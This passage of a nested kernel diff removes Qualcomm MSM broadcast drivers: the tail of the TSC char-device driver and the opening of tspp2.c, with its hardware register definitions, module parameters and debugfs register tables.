-- dev_err(&pdev->dev, "%s: Couldn't find qcom,tsc-reset-cam-gpio property\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- return 0;
--}
--
--/* TSC Mux file operations */
--static const struct file_operations tsc_mux_fops = {
-- .owner = THIS_MODULE,
-- .open = tsc_mux_open,
-- .poll = tsc_mux_poll,
-- .release = tsc_mux_release,
-- .unlocked_ioctl = tsc_mux_ioctl,
--};
--
--/* TSC CI file operations */
--static const struct file_operations tsc_ci_fops = {
-- .owner = THIS_MODULE,
-- .open = tsc_ci_open,
-- .poll = tsc_ci_poll,
-- .release = tsc_ci_release,
-- .unlocked_ioctl = tsc_ci_ioctl,
--};
--
--
--/************************ Device driver probe function ************************/
--static int msm_tsc_probe(struct platform_device *pdev)
--{
-- int ret;
--
-- tsc_device = kzalloc(sizeof(struct tsc_device), GFP_KERNEL);
-- if (!tsc_device) {
-- pr_err("%s: Unable to allocate memory for struct\n", __func__);
-- return -ENOMEM;
-- }
--
-- /* get information from device tree */
-- if (pdev->dev.of_node) {
-- ret = tsc_parse_dt(pdev);
-- if (ret != 0) {
-- pr_err("%s: devicetree data not available", __func__);
-- ret = -EINVAL;
-- goto err_dt;
-- }
-- } else { /* else - devicetree is not found */
-- pr_err("%s: devicetree data is missing", __func__);
-- ret = -EINVAL;
-- goto err_dt;
-- }
--
-- /* set up references */
-- tsc_device->pdev = pdev;
-- platform_set_drvdata(pdev, tsc_device);
--
-- /* init iommu client, group and domain */
-- if (!tsc_iommu_bypass) {
-- ret = tsc_get_iommu_info(pdev);
-- if (ret != 0)
-- return ret;
-- }
--
-- /* Map clocks */
-- ret = tsc_clocks_get(pdev);
-- if (ret != 0)
-- goto err_clocks_get;
--
-- /* map registers memory */
-- ret = tsc_map_io_memory(pdev);
-- if (ret != 0)
-- goto err_map_io;
--
-- /* map irqs */
-- ret = tsc_get_irqs(pdev);
-- if (ret != 0)
-- goto err_map_irqs;
--
-- /* get regulators and bus */
-- ret = tsc_get_regulator_bus(pdev);
-- if (ret != 0)
-- goto err_get_regulator_bus;
--
-- /* get pinctrl */
-- ret = tsc_get_pinctrl(pdev);
-- if (ret != 0)
-- goto err_pinctrl;
--
-- /* creating the tsc device's class */
-- tsc_class = class_create(THIS_MODULE, "tsc");
-- if (IS_ERR(tsc_class)) {
-- ret = PTR_ERR(tsc_class);
-- pr_err("%s: Error creating class: %d\n", __func__, ret);
-- goto err_class;
-- }
--
-- /* Initialize and register mux char device driver */
-- ret = tsc_init_char_driver(&tsc_device->mux_chdev.cdev, &tsc_mux_fops,
-- &tsc_device->mux_device_number, tsc_device->device_mux,
-- "tsc_mux");
-- if (ret != 0)
-- goto err_chdev_mux;
--
-- /* Initialize and register ci char device drivers */
-- ret = tsc_init_char_driver(&tsc_device->ci_chdev.cdev, &tsc_ci_fops,
-- &tsc_device->ci_device_number, tsc_device->device_ci,
-- "tsc_ci");
-- if (ret != 0)
-- goto err_chdev_ci;
--
-- /* Init char device counters */
-- tsc_device->num_device_open = 0;
-- tsc_device->num_mux_opened = 0;
-- tsc_device->num_ci_opened = 0;
--
-- /* Init char device mutexes and completion structs */
-- mutex_init(&tsc_device->mux_chdev.mutex);
-- mutex_init(&tsc_device->ci_chdev.mutex);
-- mutex_init(&tsc_device->mutex);
-- init_completion(&tsc_device->ci_chdev.transaction_complete);
-- init_completion(&tsc_device->ci_chdev.transaction_finish);
--
-- /* Init debugfs support */
-- tsc_debugfs_init();
--
-- return ret;
--
--err_chdev_ci:
-- device_destroy(tsc_class, tsc_device->mux_chdev.cdev.dev);
-- cdev_del(&tsc_device->mux_chdev.cdev);
--err_chdev_mux:
-- class_destroy(tsc_class);
--err_class:
--err_pinctrl:
-- if (tsc_device->bus_client)
-- msm_bus_scale_unregister_client(tsc_device->bus_client);
--
-- devm_regulator_put(tsc_device->gdsc);
--err_get_regulator_bus:
--err_map_irqs:
-- iounmap(tsc_device->base);
--err_map_io:
-- tsc_clocks_put();
--err_clocks_get:
-- tsc_free_iommu_info();
--err_dt:
-- kfree(tsc_device);
--
-- return ret;
--}
--
--/*********************** Device driver remove function ***********************/
--static int msm_tsc_remove(struct platform_device *pdev)
--{
-- /* Removing debugfs support */
-- tsc_debugfs_exit();
--
-- /* Destroying the char device mutexes */
-- mutex_destroy(&tsc_device->mux_chdev.mutex);
-- mutex_destroy(&tsc_device->ci_chdev.mutex);
--
-- /* unregistering and deleting the tsc-ci char device driver*/
-- device_destroy(tsc_class, tsc_device->ci_chdev.cdev.dev);
-- cdev_del(&tsc_device->ci_chdev.cdev);
--
-- /* unregistering and deleting the tsc-mux char device driver*/
-- device_destroy(tsc_class, tsc_device->mux_chdev.cdev.dev);
-- cdev_del(&tsc_device->mux_chdev.cdev);
--
-- /* Unregistering the char devices */
-- unregister_chrdev_region(tsc_device->ci_device_number, 1);
-- unregister_chrdev_region(tsc_device->mux_device_number, 1);
--
-- /* Removing the tsc class*/
-- class_destroy(tsc_class);
--
-- /* Unregister the bus client and the regulator */
-- if (tsc_device->bus_client)
-- msm_bus_scale_unregister_client(tsc_device->bus_client);
--
-- devm_regulator_put(tsc_device->gdsc);
--
-- /* Unmapping the io memory */
-- iounmap(tsc_device->base);
--
-- /* Releasing the clocks */
-- tsc_clocks_put();
--
-- /* Releasing the iommu info */
-- if (!tsc_iommu_bypass)
-- tsc_free_iommu_info();
--
-- /* Releasing the memory allocated for the TSC device struct */
-- kfree(tsc_device);
--
-- return 0;
--}
--
--/*********************** Platform driver information ***********************/
--static struct of_device_id msm_match_table[] = {
-- {.compatible = "qcom,msm-tsc"},
-- {}
--};
--
--static struct platform_driver msm_tsc_driver = {
-- .probe = msm_tsc_probe,
-- .remove = msm_tsc_remove,
-- .driver = {
-- .name = "msm_tsc",
-- .of_match_table = msm_match_table,
-- },
--};
--
--/**
-- * tsc_init() - TSC driver module init function.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int __init tsc_init(void)
--{
-- int ret = 0;
--
-- /* register the driver, and check hardware */
-- ret = platform_driver_register(&msm_tsc_driver);
-- if (ret) {
-- pr_err("%s: platform_driver_register failed: %d\n", __func__,
-- ret);
-- return ret;
-- }
--
-- return ret;
--}
--
--/**
-- * tsc_exit() - TSC driver module exit function.
-- */
--static void __exit tsc_exit(void)
--{
-- platform_driver_unregister(&msm_tsc_driver);
--}
--
--module_init(tsc_init);
--module_exit(tsc_exit);
--
--MODULE_DESCRIPTION("TSC platform device and two char devs: mux and ci");
--MODULE_LICENSE("GPL v2");
-diff --git a/drivers/media/platform/msm/broadcast/tspp2.c b/drivers/media/platform/msm/broadcast/tspp2.c
-deleted file mode 100644
-index 1f51dca..0000000
---- a/drivers/media/platform/msm/broadcast/tspp2.c
-+++ /dev/null
-@@ -1,8578 +0,0 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--
--#define TSPP2_MODULUS_OP(val, mod) ((val) & ((mod) - 1))
--
--/* General definitions. Note we're reserving one batch. */
--#define TSPP2_NUM_ALL_INPUTS (TSPP2_NUM_TSIF_INPUTS + TSPP2_NUM_MEM_INPUTS)
--#define TSPP2_NUM_CONTEXTS 128
--#define TSPP2_NUM_AVAIL_CONTEXTS 127
--#define TSPP2_NUM_HW_FILTERS 128
--#define TSPP2_NUM_BATCHES 15
--#define TSPP2_FILTERS_PER_BATCH 8
--#define TSPP2_NUM_AVAIL_FILTERS (TSPP2_NUM_HW_FILTERS - TSPP2_FILTERS_PER_BATCH)
--#define TSPP2_NUM_KEYTABLES 32
--#define TSPP2_TSIF_DEF_TIME_LIMIT 15000 /* Number of tsif-ref-clock ticks */
--
--#define TSPP2_NUM_EVENT_WORK_ELEMENTS 256
--
--/*
-- * Based on the hardware programming guide, HW requires we wait for up to 2ms
-- * before closing the pipes used by the filter.
-- * This is required to avoid unexpected pipe reset interrupts.
-- */
--#define TSPP2_HW_DELAY_USEC 2000
--
--/*
-- * Default source configuration:
-- * Sync byte 0x47, check sync byte,
-- * Do not monitor scrambling bits,
-- * Discard packets with invalid AF,
-- * Do not assume duplicates,
-- * Do not ignore discontinuity indicator,
-- * Check continuity of TS packets.
-- */
--#define TSPP2_DEFAULT_SRC_CONFIG 0x47801E49
--
--/*
-- * Default memory source configuration:
-- * Use 16 batches,
-- * Attach last batch to each memory source.
-- */ --#define TSPP2_DEFAULT_MEM_SRC_CONFIG 0x80000010 -- --/* Bypass VBIF/IOMMU for debug and bring-up purposes */ --static int tspp2_iommu_bypass; --module_param(tspp2_iommu_bypass, int, S_IRUGO); -- --/* Enable Invalid Adaptation Field control bits event */ --static int tspp2_en_invalid_af_ctrl; --module_param(tspp2_en_invalid_af_ctrl, int, S_IRUGO | S_IWUSR); -- --/* Enable Invalid Adaptation Field length event */ --static int tspp2_en_invalid_af_length; --module_param(tspp2_en_invalid_af_length, int, S_IRUGO | S_IWUSR); -- --/* Enable PES No Sync event */ --static int tspp2_en_pes_no_sync; --module_param(tspp2_en_pes_no_sync, int, S_IRUGO | S_IWUSR); -- --/** -- * enum tspp2_operation_opcode - TSPP2 Operation opcode for TSPP2_OPCODE -- */ --enum tspp2_operation_opcode { -- TSPP2_OPCODE_PES_ANALYSIS = 0x03, -- TSPP2_OPCODE_RAW_TRANSMIT = 0x07, -- TSPP2_OPCODE_PES_TRANSMIT = 0x00, -- TSPP2_OPCODE_PCR_EXTRACTION = 0x05, -- TSPP2_OPCODE_CIPHER = 0x01, -- TSPP2_OPCODE_INDEXING = 0x09, -- TSPP2_OPCODE_COPY_PACKET = 0x0B, -- TSPP2_OPCODE_EXIT = 0x0F --}; -- --/* TSIF Register definitions: */ --#define TSPP2_TSIF_STS_CTL (0x0000) --#define TSPP2_TSIF_TIME_LIMIT (0x0004) --#define TSPP2_TSIF_CLK_REF (0x0008) --#define TSPP2_TSIF_LPBK_FLAGS (0x000C) --#define TSPP2_TSIF_LPBK_DATA (0x0010) --#define TSPP2_TSIF_DATA_PORT (0x0100) -- --/* Bits for TSPP2_TSIF_STS_CTL register */ --#define TSIF_STS_CTL_PKT_WRITE_ERR BIT(30) --#define TSIF_STS_CTL_PKT_READ_ERR BIT(29) --#define TSIF_STS_CTL_EN_IRQ BIT(28) --#define TSIF_STS_CTL_PACK_AVAIL BIT(27) --#define TSIF_STS_CTL_1ST_PACKET BIT(26) --#define TSIF_STS_CTL_OVERFLOW BIT(25) --#define TSIF_STS_CTL_LOST_SYNC BIT(24) --#define TSIF_STS_CTL_TIMEOUT BIT(23) --#define TSIF_STS_CTL_INV_SYNC BIT(21) --#define TSIF_STS_CTL_INV_NULL BIT(20) --#define TSIF_STS_CTL_INV_ERROR BIT(19) --#define TSIF_STS_CTL_INV_ENABLE BIT(18) --#define TSIF_STS_CTL_INV_DATA BIT(17) --#define TSIF_STS_CTL_INV_CLOCK BIT(16) --#define 
TSIF_STS_CTL_PARALLEL BIT(14) --#define TSIF_STS_CTL_EN_NULL BIT(11) --#define TSIF_STS_CTL_EN_ERROR BIT(10) --#define TSIF_STS_CTL_LAST_BIT BIT(9) --#define TSIF_STS_CTL_EN_TIME_LIM BIT(8) --#define TSIF_STS_CTL_EN_TCR BIT(7) --#define TSIF_STS_CTL_TEST_MODE BIT(6) --#define TSIF_STS_CTL_MODE_2 BIT(5) --#define TSIF_STS_CTL_EN_DM BIT(4) --#define TSIF_STS_CTL_STOP BIT(3) --#define TSIF_STS_CTL_START BIT(0) -- --/* Indexing Table Register definitions: id = 0..3, n = 0..25 */ --#define TSPP2_INDEX_TABLE_PREFIX(id) (0x6000 + ((id) << 2)) --#define TSPP2_INDEX_TABLE_PREFIX_MASK(id) (0x6010 + ((id) << 2)) --#define TSPP2_INDEX_TABLE_PATTEREN(id, n) (0x3C00 + ((id) << 8) + \ -- ((n) << 3)) --#define TSPP2_INDEX_TABLE_MASK(id, n) (0x3C04 + ((id) << 8) + \ -- ((n) << 3)) --#define TSPP2_INDEX_TABLE_PARAMS(id) (0x6020 + ((id) << 2)) -- --/* Bits for TSPP2_INDEX_TABLE_PARAMS register */ --#define INDEX_TABLE_PARAMS_PREFIX_SIZE_OFFS 8 --#define INDEX_TABLE_PARAMS_NUM_PATTERNS_OFFS 0 -- --/* Source with memory input register definitions: n = 0..7 */ --#define TSPP2_MEM_INPUT_SRC_CONFIG(n) (0x6040 + ((n) << 2)) -- --/* Bits for TSPP2_MEM_INPUT_SRC_CONFIG register */ --#define MEM_INPUT_SRC_CONFIG_BATCHES_OFFS 16 --#define MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS 8 --#define MEM_INPUT_SRC_CONFIG_16_BATCHES_OFFS 4 --#define MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS 2 --#define MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS 1 --#define MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS 0 -- --/* Source with TSIF input register definitions: n = 0..1 */ --#define TSPP2_TSIF_INPUT_SRC_CONFIG(n) (0x6060 + ((n) << 2)) --#define TSIF_INPUT_SRC_CONFIG_16_BATCHES_OFFS 4 -- --/* Bits for TSPP2_TSIF_INPUT_SRC_CONFIG register */ --#define TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS 16 --#define TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS 0 -- --/* Source with any input register definitions: n = 0..9 */ --#define TSPP2_SRC_DEST_PIPES(n) (0x6070 + ((n) << 2)) --#define TSPP2_SRC_CONFIG(n) (0x6120 + ((n) << 2)) --#define TSPP2_SRC_TOTAL_TSP(n) 
(0x6600 + ((n) << 2))
--#define TSPP2_SRC_FILTERED_OUT_TSP(n) (0x6630 + ((n) << 2))
--
--/* Bits for TSPP2_SRC_CONFIG register */
--#define SRC_CONFIG_SYNC_BYTE_OFFS 24
--#define SRC_CONFIG_CHECK_SYNC_OFFS 23
--#define SRC_CONFIG_SCRAMBLING_MONITOR_OFFS 13
--#define SRC_CONFIG_VERIFY_PES_START_OFFS 12
--#define SRC_CONFIG_SCRAMBLING3_OFFS 10
--#define SRC_CONFIG_SCRAMBLING2_OFFS 8
--#define SRC_CONFIG_SCRAMBLING1_OFFS 6
--#define SRC_CONFIG_SCRAMBLING0_OFFS 4
--#define SRC_CONFIG_DISCARD_INVALID_AF_OFFS 3
--#define SRC_CONFIG_ASSUME_DUPLICATES_OFFS 2
--#define SRC_CONFIG_IGNORE_DISCONT_OFFS 1
--#define SRC_CONFIG_CHECK_CONT_OFFS 0
--
--/* Context register definitions: n = 0..127 */
--#define TSPP2_PES_CONTEXT0(n) (0x0000 + ((n) << 4))
--#define TSPP2_PES_CONTEXT1(n) (0x0004 + ((n) << 4))
--#define TSPP2_PES_CONTEXT2(n) (0x0008 + ((n) << 4))
--#define TSPP2_PES_CONTEXT3(n) (0x000C + ((n) << 4))
--#define TSPP2_INDEXING_CONTEXT0(n) (0x0800 + ((n) << 3))
--#define TSPP2_INDEXING_CONTEXT1(n) (0x0804 + ((n) << 3))
--#define TSPP2_TSP_CONTEXT(n) (0x5600 + ((n) << 2))
--
--/* Bits for TSPP2_TSP_CONTEXT register */
--#define TSP_CONTEXT_TS_HEADER_SC_OFFS 6
--#define TSP_CONTEXT_PES_HEADER_SC_OFFS 8
--
--/* Operations register definitions: f_idx = 0..127, n = 0..15 */
--#define TSPP2_OPCODE(f_idx, n) (0x1000 + \
-- ((f_idx) * (TSPP2_MAX_OPS_PER_FILTER << 2)) + \
-- ((n) << 2))
--
--/* Filter register definitions: n = 0..127 */
--#define TSPP2_FILTER_ENTRY0(n) (0x5800 + ((n) << 3))
--#define TSPP2_FILTER_ENTRY1(n) (0x5804 + ((n) << 3))
--
--/* Bits for TSPP2_FILTER_ENTRY0 register */
--#define FILTER_ENTRY0_PID_OFFS 0
--#define FILTER_ENTRY0_MASK_OFFS 13
--#define FILTER_ENTRY0_EN_OFFS 26
--#define FILTER_ENTRY0_CODEC_OFFS 27
--
--/* Bits for TSPP2_FILTER_ENTRY1 register */
--#define FILTER_ENTRY1_CONTEXT_OFFS 0
--
--/* Filter context-based counter register definitions: n = 0..127 */
--#define TSPP2_FILTER_TSP_SYNC_ERROR(n) (0x4000 + ((n) << 2))
--#define
TSPP2_FILTER_ERRED_TSP(n) (0x4200 + ((n) << 2))
--#define TSPP2_FILTER_DISCONTINUITIES(n) (0x4400 + ((n) << 2))
--#define TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(n) (0x4600 + ((n) << 2))
--#define TSPP2_FILTER_TSP_TOTAL_NUM(n) (0x4800 + ((n) << 2))
--#define TSPP2_FILTER_DISCONT_INDICATOR(n) (0x4A00 + ((n) << 2))
--#define TSPP2_FILTER_TSP_NO_PAYLOAD(n) (0x4C00 + ((n) << 2))
--#define TSPP2_FILTER_TSP_DUPLICATE(n) (0x4E00 + ((n) << 2))
--#define TSPP2_FILTER_KEY_FETCH_FAILURE(n) (0x5000 + ((n) << 2))
--#define TSPP2_FILTER_DROPPED_PCR(n) (0x5200 + ((n) << 2))
--#define TSPP2_FILTER_PES_ERRORS(n) (0x5400 + ((n) << 2))
--
--/* Pipe register definitions: n = 0..30 */
--#define TSPP2_PIPE_THRESH_CONFIG(n) (0x60A0 + ((n) << 2))
--#define TSPP2_PIPE_LAST_ADDRESS(n) (0x6190 + ((n) << 2))
--#define TSPP2_PIPE_SECURITY 0x6150
--#define TSPP2_DATA_NOT_SENT_ON_PIPE(n) (0x6660 + ((n) << 2))
--
--/* Global register definitions: */
--#define TSPP2_PCR_GLOBAL_CONFIG 0x6160
--#define TSPP2_CLK_TO_PCR_TIME_UNIT 0x6170
--#define TSPP2_DESC_WAIT_TIMEOUT 0x6180
--#define TSPP2_GLOBAL_IRQ_STATUS 0x6300
--#define TSPP2_GLOBAL_IRQ_CLEAR 0x6304
--#define TSPP2_GLOBAL_IRQ_ENABLE 0x6308
--#define TSPP2_KEY_NOT_READY_IRQ_STATUS 0x6310
--#define TSPP2_KEY_NOT_READY_IRQ_CLEAR 0x6314
--#define TSPP2_KEY_NOT_READY_IRQ_ENABLE 0x6318
--#define TSPP2_UNEXPECTED_RST_IRQ_STATUS 0x6320
--#define TSPP2_UNEXPECTED_RST_IRQ_CLEAR 0x6324
--#define TSPP2_UNEXPECTED_RST_IRQ_ENABLE 0x6328
--#define TSPP2_WRONG_PIPE_DIR_IRQ_STATUS 0x6330
--#define TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR 0x6334
--#define TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE 0x6338
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS 0x6340
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR 0x6344
--#define TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE 0x6348
--#define TSPP2_SRC_TOTAL_TSP_RESET 0x6710
--#define TSPP2_SRC_FILTERED_OUT_TSP_RESET 0x6714
--#define TSPP2_DATA_NOT_SENT_ON_PIPE_RESET 0x6718
--#define TSPP2_VERSION 0x6FFC
--
--/* Bits for TSPP2_GLOBAL_IRQ_CLEAR register */
--#define GLOBAL_IRQ_CLEAR_RESERVED_OFFS 4
--
--/* Bits for TSPP2_VERSION register */
--#define VERSION_MAJOR_OFFS 28
--#define VERSION_MINOR_OFFS 16
--#define VERSION_STEP_OFFS 0
--
--/* Bits for TSPP2_GLOBAL_IRQ_XXX registers */
--#define GLOBAL_IRQ_TSP_INVALID_AF_OFFS 0
--#define GLOBAL_IRQ_TSP_INVALID_LEN_OFFS 1
--#define GLOBAL_IRQ_PES_NO_SYNC_OFFS 2
--#define GLOBAL_IRQ_ENCRYPT_LEVEL_ERR_OFFS 3
--#define GLOBAL_IRQ_KEY_NOT_READY_OFFS 4
--#define GLOBAL_IRQ_UNEXPECTED_RESET_OFFS 5
--#define GLOBAL_IRQ_QSB_RESP_ERR_OFFS 6
--#define GLOBAL_IRQ_WRONG_PIPE_DIR_OFFS 7
--#define GLOBAL_IRQ_SC_GO_HIGH_OFFS 8
--#define GLOBAL_IRQ_SC_GO_LOW_OFFS 9
--#define GLOBAL_IRQ_READ_FAIL_OFFS 16
--#define GLOBAL_IRQ_FC_STALL_OFFS 24
--
--/* Bits for TSPP2_PCR_GLOBAL_CONFIG register */
--#define PCR_GLOBAL_CONFIG_PCR_ON_DISCONT_OFFS 10
--#define PCR_GLOBAL_CONFIG_STC_OFFSET_OFFS 8
--#define PCR_GLOBAL_CONFIG_PCR_INTERVAL_OFFS 0
--#define PCR_GLOBAL_CONFIG_PCR_ON_DISCONT BIT(10)
--#define PCR_GLOBAL_CONFIG_STC_OFFSET (BIT(8)|BIT(9))
--#define PCR_GLOBAL_CONFIG_PCR_INTERVAL 0xFF
--
--/* n = 0..3, each register handles 32 filters */
--#define TSPP2_SC_GO_HIGH_STATUS(n) (0x6350 + ((n) << 2))
--#define TSPP2_SC_GO_HIGH_CLEAR(n) (0x6360 + ((n) << 2))
--#define TSPP2_SC_GO_HIGH_ENABLE(n) (0x6370 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_STATUS(n) (0x6390 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_CLEAR(n) (0x63A0 + ((n) << 2))
--#define TSPP2_SC_GO_LOW_ENABLE(n) (0x63B0 + ((n) << 2))
--
--/* n = 0..3, each register handles 32 contexts */
--#define TSPP2_TSP_CONTEXT_RESET(n) (0x6500 + ((n) << 2))
--#define TSPP2_PES_CONTEXT_RESET(n) (0x6510 + ((n) << 2))
--#define TSPP2_INDEXING_CONTEXT_RESET(n) (0x6520 + ((n) << 2))
--
--/* debugfs entries */
--
--#define TSPP2_S_RW (S_IRUGO | S_IWUSR)
--
--struct debugfs_entry {
-- const char *name;
-- mode_t mode;
-- int offset;
--};
--
--static const struct debugfs_entry tsif_regs[] = {
-- {"sts_ctl", TSPP2_S_RW, TSPP2_TSIF_STS_CTL},
-- {"time_limit",
TSPP2_S_RW, TSPP2_TSIF_TIME_LIMIT},
-- {"clk_ref", TSPP2_S_RW, TSPP2_TSIF_CLK_REF},
-- {"lpbk_flags", TSPP2_S_RW, TSPP2_TSIF_LPBK_FLAGS},
-- {"lpbk_data", TSPP2_S_RW, TSPP2_TSIF_LPBK_DATA},
-- {"data_port", S_IRUGO, TSPP2_TSIF_DATA_PORT},
--};
--
--static const struct debugfs_entry tspp2_regs[] = {
-- /* Memory input source configuration registers */
-- {"mem_input_src_config_0", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(0)},
-- {"mem_input_src_config_1", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(1)},
-- {"mem_input_src_config_2", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(2)},
-- {"mem_input_src_config_3", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(3)},
-- {"mem_input_src_config_4", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(4)},
-- {"mem_input_src_config_5", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(5)},
-- {"mem_input_src_config_6", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(6)},
-- {"mem_input_src_config_7", TSPP2_S_RW, TSPP2_MEM_INPUT_SRC_CONFIG(7)},
-- /* TSIF input source configuration registers */
-- {"tsif_input_src_config_0", TSPP2_S_RW, TSPP2_TSIF_INPUT_SRC_CONFIG(0)},
-- {"tsif_input_src_config_1", TSPP2_S_RW, TSPP2_TSIF_INPUT_SRC_CONFIG(1)},
-- /* Source destination pipes association registers */
-- {"src_dest_pipes_0", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(0)},
-- {"src_dest_pipes_1", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(1)},
-- {"src_dest_pipes_2", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(2)},
-- {"src_dest_pipes_3", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(3)},
-- {"src_dest_pipes_4", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(4)},
-- {"src_dest_pipes_5", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(5)},
-- {"src_dest_pipes_6", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(6)},
-- {"src_dest_pipes_7", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(7)},
-- {"src_dest_pipes_8", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(8)},
-- {"src_dest_pipes_9", TSPP2_S_RW, TSPP2_SRC_DEST_PIPES(9)},
-- /* Source configuration registers */
-- {"src_config_0", TSPP2_S_RW, TSPP2_SRC_CONFIG(0)},
-- {"src_config_1", TSPP2_S_RW, TSPP2_SRC_CONFIG(1)},
-- {"src_config_2",
TSPP2_S_RW, TSPP2_SRC_CONFIG(2)},
-- {"src_config_3", TSPP2_S_RW, TSPP2_SRC_CONFIG(3)},
-- {"src_config_4", TSPP2_S_RW, TSPP2_SRC_CONFIG(4)},
-- {"src_config_5", TSPP2_S_RW, TSPP2_SRC_CONFIG(5)},
-- {"src_config_6", TSPP2_S_RW, TSPP2_SRC_CONFIG(6)},
-- {"src_config_7", TSPP2_S_RW, TSPP2_SRC_CONFIG(7)},
-- {"src_config_8", TSPP2_S_RW, TSPP2_SRC_CONFIG(8)},
-- {"src_config_9", TSPP2_S_RW, TSPP2_SRC_CONFIG(9)},
-- /* Source total TS packets counter registers */
-- {"src_total_tsp_0", S_IRUGO, TSPP2_SRC_TOTAL_TSP(0)},
-- {"src_total_tsp_1", S_IRUGO, TSPP2_SRC_TOTAL_TSP(1)},
-- {"src_total_tsp_2", S_IRUGO, TSPP2_SRC_TOTAL_TSP(2)},
-- {"src_total_tsp_3", S_IRUGO, TSPP2_SRC_TOTAL_TSP(3)},
-- {"src_total_tsp_4", S_IRUGO, TSPP2_SRC_TOTAL_TSP(4)},
-- {"src_total_tsp_5", S_IRUGO, TSPP2_SRC_TOTAL_TSP(5)},
-- {"src_total_tsp_6", S_IRUGO, TSPP2_SRC_TOTAL_TSP(6)},
-- {"src_total_tsp_7", S_IRUGO, TSPP2_SRC_TOTAL_TSP(7)},
-- {"src_total_tsp_8", S_IRUGO, TSPP2_SRC_TOTAL_TSP(8)},
-- {"src_total_tsp_9", S_IRUGO, TSPP2_SRC_TOTAL_TSP(9)},
-- /* Source total filtered out TS packets counter registers */
-- {"src_filtered_out_tsp_0", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(0)},
-- {"src_filtered_out_tsp_1", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(1)},
-- {"src_filtered_out_tsp_2", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(2)},
-- {"src_filtered_out_tsp_3", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(3)},
-- {"src_filtered_out_tsp_4", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(4)},
-- {"src_filtered_out_tsp_5", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(5)},
-- {"src_filtered_out_tsp_6", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(6)},
-- {"src_filtered_out_tsp_7", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(7)},
-- {"src_filtered_out_tsp_8", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(8)},
-- {"src_filtered_out_tsp_9", S_IRUGO, TSPP2_SRC_FILTERED_OUT_TSP(9)},
-- /* Global registers */
-- {"pipe_security", TSPP2_S_RW, TSPP2_PIPE_SECURITY},
-- {"pcr_global_config", TSPP2_S_RW, TSPP2_PCR_GLOBAL_CONFIG},
-- {"clk_to_pcr_time_unit", TSPP2_S_RW,
TSPP2_CLK_TO_PCR_TIME_UNIT},
-- {"desc_wait_timeout", TSPP2_S_RW, TSPP2_DESC_WAIT_TIMEOUT},
-- {"global_irq_status", S_IRUGO, TSPP2_GLOBAL_IRQ_STATUS},
-- {"global_irq_clear", S_IWUSR, TSPP2_GLOBAL_IRQ_CLEAR},
-- {"global_irq_en", TSPP2_S_RW, TSPP2_GLOBAL_IRQ_ENABLE},
-- {"key_not_ready_irq_status", S_IRUGO, TSPP2_KEY_NOT_READY_IRQ_STATUS},
-- {"key_not_ready_irq_clear", S_IWUSR, TSPP2_KEY_NOT_READY_IRQ_CLEAR},
-- {"key_not_ready_irq_en", TSPP2_S_RW, TSPP2_KEY_NOT_READY_IRQ_ENABLE},
-- {"unexpected_rst_irq_status", S_IRUGO, TSPP2_UNEXPECTED_RST_IRQ_STATUS},
-- {"unexpected_rst_irq_clear", S_IWUSR, TSPP2_UNEXPECTED_RST_IRQ_CLEAR},
-- {"unexpected_rst_irq_en", TSPP2_S_RW, TSPP2_UNEXPECTED_RST_IRQ_ENABLE},
-- {"wrong_pipe_dir_irq_status", S_IRUGO, TSPP2_WRONG_PIPE_DIR_IRQ_STATUS},
-- {"wrong_pipe_dir_irq_clear", S_IWUSR, TSPP2_WRONG_PIPE_DIR_IRQ_CLEAR},
-- {"wrong_pipe_dir_irq_en", TSPP2_S_RW, TSPP2_WRONG_PIPE_DIR_IRQ_ENABLE},
-- {"qsb_response_error_irq_status", S_IRUGO,
-- TSPP2_QSB_RESPONSE_ERROR_IRQ_STATUS},
